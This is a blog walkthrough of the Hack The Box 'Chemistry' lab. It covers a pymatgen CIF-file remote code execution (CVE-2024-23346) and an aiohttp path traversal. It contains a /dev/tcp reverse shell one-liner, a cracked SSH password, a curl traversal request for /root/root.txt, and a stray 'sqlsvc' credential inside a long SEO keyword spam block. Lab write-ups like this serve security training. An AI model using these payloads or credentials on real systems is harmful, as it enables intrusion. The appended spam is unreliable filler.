Welcome to another Hack the Box exercise. In this walkthrough, I have documented how I pwned the Chemistry machine on Hack the Box. Hack The Box is a cybersecurity platform that helps you bridge knowledge gaps and prepares you for cyber security jobs.
About the Machine
Chemistry is an easy-difficulty Linux machine that showcases a Remote Code Execution (RCE) vulnerability in the pymatgen CVE-2024-23346 Python library by uploading a malicious `CIF` file to the hosted CIF Analyzer website on the target. After discovering and cracking hashes, we authenticate to the target via SSH as rosa user. For privilege escalation, we exploit a Path Traversal vulnerability that leads to an Arbitrary File Read in a Python library called AioHTTP (CVE-2024-23334) which is used on the web application running internally to read the root flag.
Like I have always done in my previous post, the first step in solving a machine is connecting the Kali Linux terminal with Hack the Box server by logging into HTB account and navigating to "Machines" and selecting the machine you want to pwn. In this case, I selected "Chemistry" and download the lab access file and renamed it to chemistry.ovpn
I love doing this because it allows me keep track of all the files I am downloading on my Linux system and also for simplicity (keeping the name short as possible.) After the file was downloaded, I created a directory "ChemistryHTB" on my desktop and moved the file into it. Then, I opened a new terminal and run the following command to connect my terminal with HTB server:
The sudo openvpn chemistry.ovpn command connected my Kali Linux terminal and Hack the Box server together. Once the connection has been successfully established, I performed Nmap enumeration to scan for open ports that are available on the target machine. This step is crucial to know what the machine is all about and what the next step to perform is.
I right-clicked on the terminal and chose “split terminal vertically” to open a new terminal. Then, I typed the following command to find the open ports on the target machine IP address:
The nmap scan revealed two opened port: Port 22/tcp (which indicates the target machine is a web app), port 5000/tcp (default port for web servers that run Python-based web applications. It is also used by some network backup software and for running decentralized applications on the Ethereum blockchain network)
After the nmap enumeration has been completed, I added the target IP address to the etc/host file by running the following command:
To exit the GNU interface, simply hold “Ctrl + X” and press “Y” and “Enter” on the keyboard to save and exit from the GNU editor. Next, I navigated to my Firefox browser and visited 10.10.11.38 or chemistry.htb and the following output was gotten from my visit.
10.10.11.38:5000 was the response from the webpage (with an attached port) The website interface presented two buttons, one for logging in and another to register. So I registered an account with a username and password submission and I tried to login with the same credential.
On the dashboard, the system provided a button to upload a file and also a button to submit it.
The only acceptable file type is .cif. I have no idea what this means so I decided to search on Google. I found out that CIF is an acronym for Crystallographic Information File. Crystallographic Information File (CIF) is a standard text file format for representing crystallographic information, promulgated by the International Union of Crystallography (IUCr).
For every file upload, the first thing that cross my mind is reverse shell. I searched for common vulnerabilities that are associated with CIF and found a few such as CVE-2023-48031, CVE-2024-23346. The CVE-2024-23346 stood out and I decided to find out about the vulnerability by digging deeper.
Summary of the CVE
CVE-2024-23346 features a critical security vulnerability which exists in the JonesFaithfulTransformation.from_transformation_str() method within the pymatgen library. This method insecurely utilizes eval() for processing input, enabling execution of arbitrary code when parsing untrusted input. This can be exploited when parsing a maliciously-created CIF file.
The cause of the vulnerability is in pymatgen/symmetry/settings.py#L97C1-L111C108. The flawed code segment involves a regular expression operation followed by the use of eval().
Vulnerable code
The use of eval, even with __builtins__ set to None, is still a security risk. The BuiltinImporter class can be recovered with subclass traversal.
Proof of Concept
The vulnerability can be exploited as follows:
Create a file vuln.cif with the following contents:
Then, parse the cif file with the following code:
Alternatively, you can use the complete CIF file I used which worked for me by creating a vuln.cif and pasting the following code in the content.
Make sure to check the IP address of your machine by running ifconfig and change the system("/bin/bash -c 'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1'") accordingly. After modifying the necessary part of the code, I uploaded the vuln.cif file and setup a netcat listener to spawn the reverse shell.
After uploading the vuln.cif file, click on "View" to execute the payload and wait for the response from the netcat listener.
After a few seconds, I got a shell and decided to stabilize it by running:
I got the shell as app@chemistry and I navigated my way around until I found the user.txt file. I tried to read the file by running:
But the permission failed. I don't have enough privilege to read the file. One thing that caught my eyes while navigating my way around was in the home directory. I found a user rosa in the /home directory and knew I need to get a shell as the user. I searched everywhere and luckily I found a database.db file in static/template/instance directory.
To read the content of the database file, I ran the following command and found a hash file starting with Mrosa:
I copied the hash and attempted to crack it by visited https://crackstation.net. The result of the hashed file was unicorniosrosados. I copied it and attempted to use the password to authenticate rosa by sshing.
I ran the following command and just like magic, it worked and I was able to obtain rosa@chemistry shell by using the password unicorniosrosados to authenticate the user:
After gaining rosa@chemistry shell, I listed all the files in the directory and found three files which include the user.txt and I opened the file by running:
Hurray!!! I found the user flag.
The next step was trying to obtain the root flag. The first thing I did was to check the list of active listening network connections along with the associated processes by running the following command:
I noticed something interesting in the localhost:8080 address and decided to dig deeper. Then, I tried setting up a local port forwarding tunnel via SSH by running the following command in the terminal:
It connects to the remote machine at 10.10.11.38 as user rosa, and forwards the local port 7000 to 127.0.0.1:8080 on the remote machine.
Afterwards, I sent an HTTP HEAD request to localhost on port 8080 by running the following command:
This is useful for quickly checking if a server is up and what headers it returns (status code, content-type, etc.) Then I tried to exploit the path traversal vulnerability, which happens when a server improperly handles file paths and allows an attacker to access files outside the intended directory by running the following command:
Breakdown:
- curl -s: Runs curl silently.
- --path-as-is: Tells curl not to normalize the URL path.
- http://localhost:8080/assets/../../../../root/root.txt: The URL attempts to go up four directories (../../../../) and access /root/root.txt.
Hurry!!! I got the root flag
Congratulations if you made it this far. If you enjoy reading my writeups, kindly subscribe to my channel and follow me on my social media handles:
YouTube channel: https://m.youtube.com/@BoltechTechnologies1
LinkedIn: https://www.linkedin.com/in/isiaq-ibrahim-468588156/
Twitter at https://x.com/BoltechNG
Follow me on Medium: https://medium.com/@boltech
This walkthrough was first published on Medium on October 23rd 2024. The walkthrough had 6 views and 2 reads on Medium before it was suspended by Medium and Hack the Box for uploading spoiler.
Keywords:
pirate.htb
pirate hack the box walkthrough
pirate htb writeup
pirate hackthebox exploit
pirate htb privilege escalation
pirate hack the box root flag
pirate hack the box user flag
pirate htb nmap scan
pirate hack the box enumeration
pirate hack the box exploit guide
pirate hack the box step by step
pirate hack the box tutorial
pirate htb attack path
pirate hack the box full walkthrough
pirate htb web exploitation
pirate hack the box kali walkthrough
pirate hack the box root guide
pirate htb enumeration guide
pirate hack the box exploit chain
pirate htb root shell
pirate hack the box writeup blog
pirate hack the box solution
pirate htb penetration testing lab
pirate hack the box reverse shell
pirate hack the box vulnerability
pirate htb privilege escalation guide
pirate hack the box ctf writeup
pirate hack the box enumeration commands
pirate hack the box exploitation tutorial
pirate hack the box attack chain
pirate hack the box complete guide
pirate Hack The Box Walkthrough | Step-By-Step HTB Writeup
pirate Hack The Box Walkthrough | HTB Writeup
overwatch.htb
overwatch hack the box walkthrough
overwatch htb writeup
overwatch hackthebox exploit
overwatch htb privilege escalation
overwatch hack the box root flag
overwatch hack the box user flag
overwatch htb enumeration
overwatch hack the box exploit guide
overwatch hack the box tutorial
overwatch hack the box step by step
overwatch htb nmap scan
overwatch hack the box full walkthrough
overwatch hack the box kali walkthrough
overwatch htb web exploitation
overwatch hack the box attack path
overwatch htb enumeration guide
overwatch hack the box exploit chain
overwatch hack the box root guide
overwatch htb reverse shell
overwatch hack the box vulnerability
overwatch hack the box ctf walkthrough
overwatch hack the box penetration testing
overwatch htb solution
overwatch hack the box exploitation tutorial
overwatch hack the box enumeration commands
overwatch htb privilege escalation guide
overwatch hack the box writeup blog
overwatch hack the box attack chain
overwatch hack the box complete guide
overwatch htb root shell
overwatch Hack The Box Walkthrough | Step-By-Step HTB Writeup
overwatch Hack The Box Walkthrough | HTB Writeup
airtouch.htb
airtouch hack the box walkthrough
airtouch htb writeup
airtouch hackthebox exploit
airtouch htb privilege escalation
airtouch hack the box root flag
airtouch hack the box user flag
airtouch htb enumeration
airtouch hack the box exploit guide
airtouch hack the box tutorial
airtouch hack the box step by step
airtouch htb nmap scan
airtouch hack the box full walkthrough
airtouch hack the box kali walkthrough
airtouch htb web exploitation
airtouch hack the box attack path
airtouch htb enumeration guide
airtouch hack the box exploit chain
airtouch hack the box root guide
airtouch htb reverse shell
airtouch hack the box vulnerability
airtouch hack the box ctf walkthrough
airtouch hack the box penetration testing
airtouch htb solution
airtouch hack the box exploitation tutorial
airtouch hack the box enumeration commands
airtouch htb privilege escalation guide
airtouch hack the box writeup blog
airtouch hack the box attack chain
airtouch hack the box complete guide
airtouch htb root shell
airtouch Hack The Box Walkthrough | Step-By-Step HTB Writeup
airtouch Hack The Box Walkthrough | HTB Writeup
browsed.htb
browsed hack the box walkthrough
browsed htb writeup
browsed hackthebox exploit
browsed htb privilege escalation
browsed hack the box root flag
browsed hack the box user flag
browsed htb enumeration
browsed hack the box exploit guide
browsed hack the box tutorial
browsed hack the box step by step
browsed htb nmap scan
browsed hack the box full walkthrough
browsed hack the box kali walkthrough
browsed htb web exploitation
browsed hack the box attack path
browsed htb enumeration guide
browsed hack the box exploit chain
browsed hack the box root guide
browsed htb reverse shell
browsed hack the box vulnerability
browsed hack the box ctf walkthrough
browsed hack the box penetration testing
browsed htb solution
browsed hack the box exploitation tutorial
browsed hack the box enumeration commands
browsed htb privilege escalation guide
browsed hack the box writeup blog
browsed hack the box attack chain
browsed hack the box complete guide
browsed htb root shell
browsed Hack The Box Walkthrough | Step-By-Step HTB Writeup
browsed Hack The Box Walkthrough | HTB Writeup
gavel hack the box walkthrough
gavel htb writeup
gavel hackthebox exploit
gavel htb root guide
gavel hack the box user flag
gavel hack the box enumeration
gavel htb privilege escalation
gavel hack the box writeup step by step
gavel htb nmap scan
gavel hack the box exploit guide
gavel hack the box walkthrough kali
gavel htb root shell
gavel hack the box tutorial
gavel htb attack path
gavel hack the box pentest guide
gavel htb walkthrough blog
gavel hack the box writeup github
gavel htb exploit walkthrough
gavel hack the box user root guide
gavel htb full walkthrough
eighteen hack the box walkthrough
eighteen htb writeup
eighteen hackthebox exploit
eighteen htb root guide
eighteen hack the box user flag
eighteen hack the box enumeration
eighteen htb privilege escalation
eighteen hack the box writeup step by step
eighteen htb nmap scan
eighteen hack the box exploit guide
eighteen hack the box walkthrough kali
eighteen htb root shell
eighteen hack the box tutorial
eighteen htb attack path
eighteen hack the box pentest guide
eighteen htb walkthrough blog
eighteen hack the box writeup github
eighteen htb exploit walkthrough
eighteen hack the box user root guide
eighteen htb full walkthrough
monitorsfour hack the box walkthrough
monitorsfour htb writeup
monitorsfour hackthebox exploit
monitorsfour htb root guide
monitorsfour hack the box user flag
monitorsfour hack the box enumeration
monitorsfour htb privilege escalation
monitorsfour hack the box writeup step by step
monitorsfour htb nmap scan
monitorsfour hack the box exploit guide
monitorsfour hack the box walkthrough kali
monitorsfour htb root shell
monitorsfour hack the box tutorial
monitorsfour htb attack path
monitorsfour hack the box pentest guide
monitorsfour htb walkthrough blog
monitorsfour hack the box writeup github
monitorsfour htb exploit walkthrough
monitorsfour hack the box user root guide
monitorsfour htb full walkthrough
cron privilege escalation
sudo privilege escalation
path privilege escalation
kernel exploit tutorial
token impersonation attack
active directory privilege escalation
hack the box sql injection walkthrough
hack the box sql injection exploit
hack the box sql injection privilege escalation
hack the box sql injection tutorial
hack the box sql injection machine
Local File Inclusion
hack the box lfi walkthrough
hack the box lfi exploitation tutorial
hack the box lfi privilege escalation
hack the box lfi exploit guide
Remote Code Execution
hack the box rce walkthrough
hack the box remote code execution exploit
hack the box rce machine tutorial
command injection
hack the box command injection walkthrough
hack the box command injection exploit
deserialization
hack the box insecure deserialization exploit
privilege escalation
hack the box linux privilege escalation tutorial
hack the box windows privilege escalation tutorial
hack the box nmap enumeration tutorial
hack the box nmap scanning guide
hack the box nmap scripts tutorial
hack the box gobuster directory brute force
hack the box gobuster tutorial
hack the box ffuf enumeration tutorial
hack the box ffuf directory fuzzing
hack the box burp suite exploitation
hack the box burp suite tutorial
hack the box metasploit exploit tutorial
hack the box beginner machines
hack the box intermediate machines
hack the box advanced machines
hack the box insane machines walkthrough
hack the box hard machines walkthrough
hack the box medium machines walkthrough
hack the box medium machine writeup
hack the box easy machines walkthrough
hack the box easy machines list
hack the box easy machines for beginners
Hack The Box Nmap Enumeration Guide
Hack The Box Linux Privilege Escalation Guide
Hack The Box Active Directory Attacks
Hack The Box Machines Walkthrough List
hack the box oscp practice machines
hack the box oscp walkthrough
hack the box oscp preparation
hack the box cpts practice labs
hack the box cpts walkthrough
hack the box penetration testing practice
hack the box pentesting lab tutorial
hack the box hacking course practice
hack the box ctf hacking tutorial
hack the box cybersecurity training lab
ethical hacking practice lab
penetration testing training lab
hacking practice for beginners
hack the box walkthrough
hack the box writeup
hack the box machines
hack the box machines list
hack the box tutorial
hack the box beginner guide
hack the box ctf walkthrough
hack the box penetration testing lab
hack the box practice machines
hack the box hacking tutorial
hack the box walkthrough step by step
hack the box writeups for beginners
hack the box machines for beginners
Just completed the HackTheBox "Overwatch" machine
hack the box linux machines
s200401.overwatch.htb -u 'sqlsvc' -p 'TI0LKcfHzZw1Vv'
hack the box windows machines
Writeups for HTB machines
hack the box enumeration tutorial
hack the box privilege escalation guide
hack the box root flag tutorial
hack the box user flag tutorial
hack the box hacking practice
hack the box machines guide
hack the box pentesting tutorial
hack the box oscp practice machines
hack the box cpts practice labs
hack the box hacking lab tutorial
hack the box machine exploitation
hack the box web exploitation tutorial
hack the box attack path guide
Hack The Box Nmap Enumeration Guide
Hack The Box Gobuster Tutorial
Hack The Box FFUF Guide
Hack The Box Machines Walkthrough (Complete Guide)
hack the box web exploitation tutorial
hack the box sql injection walkthrough
hack the box lfi walkthrough tutorial
hack the box rce exploit walkthrough
hack the box xss exploitation tutorial
hack the box walkthrough step by step
hack the box machine walkthrough kali linux
hack the box writeup beginner friendly
hack the box root privilege escalation guide
hack the box enumeration tutorial
hack the box user flag tutorial
hack the box root flag tutorial
hack the box nmap enumeration guide
hack the box gobuster enumeration tutorial
hack the box ffuf enumeration guide
hack the box exploitation tutorial
hack the box reverse shell guide
hack the box privilege escalation linux tutorial
hack the box privilege escalation windows tutorial
hack the box active directory walkthrough
HTB machine guides
hack the box machines walkthrough
hack the box machines writeup
hack the box machines list
hack the box machines easy
hack the box machines medium
hack the box machines hard
hack the box machines tutorial
hack the box machines guide
hack the box machines solutions
hack the box machines root guide
hack the box machines user flag
hack the box machines enumeration
hack the box machines exploitation
hack the box machines privilege escalation
hack the box machines linux walkthrough
hack the box machines windows walkthrough
hack the box machines retired writeups
hack the box machines walkthrough step by step
hack the box machines for beginners
hack the box machines writeups github
hack the box machines tutorial for beginners
hack the box machines penetration testing practice
hack the box machines ctf walkthrough
hack the box machines enumeration guide
hack the box machines root exploit
hack the box machines user flag guide
hack the box machines privilege escalation guide
hack the box machines web exploitation
hack the box machines active directory walkthrough
hack the box machines linux privilege escalation
hack the box machines windows privilege escalation
hack the box machines writeups 2026
HTB Certified Web Exploitation Specialist (HTB CWES)
hack the box machines writeups 2025
HTB Certified Web Exploitation Specialist (HTB CWES)
hack the box machines walkthrough blog
I just pwned Overwatch on Hack The Box!
hack the box machines tutorial youtube
Overwatch Walkthrough Htb
hack the box machines beginner friendly
HTB Pro Labs!
hack the box machines practice list
Owned Overwatch from Hack The Box!
labs.hackthebox.com
hack the box machines oscp practice
hack the box machines cpts practice
hack the box machines pentesting practice
hack the box machines guide step by step
hack the box machines web vulnerabilities
hack the box machines sqli walkthrough
hack the box machines lfi walkthrough
hack the box machines rce walkthrough
hack the box machines xss walkthrough
hack the box machines enumeration commands
hack the box machines nmap enumeration
hack the box machines gobuster guide
hack the box machines ffuf enumeration
hack the box machines metasploit exploit
hack the box machines manual exploitation
hack the box machines reverse shell guide
hack the box machines privilege escalation linux guide
hack the box machines privilege escalation windows guide
hack the box machines writeups pdf
overwatch.htb S200401.overwatch.htb overwatch.htb0
hack the box machines walkthrough blogspot
hack the box machines writeups medium
hack the box machines ctf practice list
hack the box machines labs guide
hack the box machines root flag tutorial
hack the box machines user flag tutorial
hack the box machines exploit guide
hack the box machines attack path
hack the box machines hacking tutorial
hack the box machines penetration testing lab
hack the box machines walkthrough kali linux
hack the box machines kali linux guide
hack the box machines oscp style
hackthebox-writeups overwatch
hack the box machines beginner walkthrough
hack the box machines retired list
Owned Overwatch from Hack The Box!
hack the box machines walkthrough writeup
hack the box machines exploitation guide
HTB Overwatch - PWNED!
hack the box machines step by step hacking
hack the box machines root shell guide
HTB-Walkthroughs/Overwatch
hack the box machines enumeration tools
hack the box machines vulnerability exploitation
hack the box machines hacking practice
hack the box machines pentest lab guide
HackTheBox - Overwatch Writeup
hack the box machines vulnerability lab
Overwatch - HTB Seasonal
hack the box machines enumeration cheat sheet
ctf-writeups HTB Active Overwatch GitHub
hack the box machines linux hacking lab
hack the box machines windows hacking lab
HackTheBox - Machine - Overwatch
HackTheBox - Machine - AirTouch
HackTheBox - Machine - Browsed
HTB Academy - CWEE
hack the box machines attack chain
hack the box machines reconnaissance guide
hack the box machines root privilege escalation
"Overwatch" by Hack The Box - A "Medium" Windows Box Writeup
hack the box machines beginner lab
Owned Overwatch from Hack The Box!
hack the box machines pentesting tutorial
Overwatch HTB machine
hack the box machines ctf hacking guide
hack the box machines attack walkthrough
HTB Archives
hack the box machines hacking lab tutorial
Hackthebox CTF writeups
Overwatch HackTheBox Overwatch machine writeup
hack the box machines vulnerability exploitation guide
hack the box machines linux exploit tutorial
Htb Overwatch
hack the box machines windows exploit tutorial
Overwatch Htb
hack the box machines security training lab
overwatch htb writeup
CTF #Overwatch #HTB
hack the box machines practical hacking
htb overwatch solution
replaceme htb
monitors your hackthebox
overwatch hackthebox writeup
hack the box machines hacking course practice
overwatch htb walkthrough
hack the box machines walkthrough notes
Hackthebox - Overwatch
overwatch.exe.config overwatch.htb
Hackthebox - Overwatch.exe
hack the box machines exploit development
Overwatch - HTB Writeup
hack the box machines real world hacking practice
HackTheBox Overwatch - Windows Server 2022 box
machine walkthrough
Overwatch WriteUp - HackTheBox
machine writeup
HTB: Overwatch
machine exploit
overwatch HTB CBBH overwatch HTB CWES!
Overwatch HackTheBox Windows machine
machine root
Overwatch HTB box
machine user flag
0 Comments